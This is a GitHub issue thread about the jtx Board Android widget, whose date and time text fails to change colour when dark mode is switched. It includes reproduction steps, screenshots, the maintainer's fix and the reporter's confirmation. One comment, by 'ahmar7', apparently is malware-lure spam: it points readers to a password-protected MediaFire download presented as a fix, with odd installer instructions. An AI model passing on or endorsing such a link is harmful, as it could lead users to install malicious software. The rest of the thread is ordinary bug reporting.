### ISSUE TITLE
 [BUG] Widget font color does not adjust to dark mode

### ISSUE THREAD

**Issue by BaumiCoder** [TechbeeAT/jtxBoard#1560]
## Describe the bug

The font color of the widget for the details does not adjust to the android dark mode. Even if the Opacity is not reduced.

### Way A

1. Place the widget of jtx board some where
2. Reboot your phone **without** android dark mode
3. **Activate** dark mode
4. Go to the jtx board widget
5. The font color of the details (date and time) is as dark as the background

### Way B

1. Place the widget of jtx board some where
2. Reboot your phone **with** android dark mode
3. **Deactivate** dark mode
4. Go to the jtx board widget
5. The font color of the details (date and time) is almost as light as the background

## Expected behavior

The font color adjust to the new background color of the widget.

### Transparent options

![Opacity option](https://github.com/user-attachments/assets/cb14620b-5f09-4aad-9594-bbff1261c6a3)

### Way A

| light | dark |
| ------ | ------- |
| ![Boot without dark mode (light)](https://github.com/user-attachments/assets/6def4dee-f04a-43bb-9663-9aeece97318b) | ![Boot without dark mode (dark)](https://github.com/user-attachments/assets/3a0c3d21-9ddc-403e-8238-083c3f9de009) |

### Way B

| light | dark |
| ------ | ------- |
| ![Boot with dark mode (light)](https://github.com/user-attachments/assets/81b68a90-5843-46dc-bd59-b46087e517f3) | ![Boot with dark mode (dark)](https://github.com/user-attachments/assets/e50b0891-a778-48fd-816c-198f7f49c525) |

## Device and version
 - Device: Fairphone 4
 - Android version: /e/OS 2.3 (Android 13)
 - jtx Board version: 2.09.01.ose (209010003)
 - Downloaded from: App Lounge (which gets it from F-Droid)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by patrickunterwegs** [comment]
Hi @BaumiCoder !
Sorry for not coming back to you earlier, I have found the problem and just fixed it, I will provide a new version soon.

**Comment by BaumiCoder** [comment]
✅ Successfully tested with Version 2.09.03.ose (209030008) 
Thanks for the fix
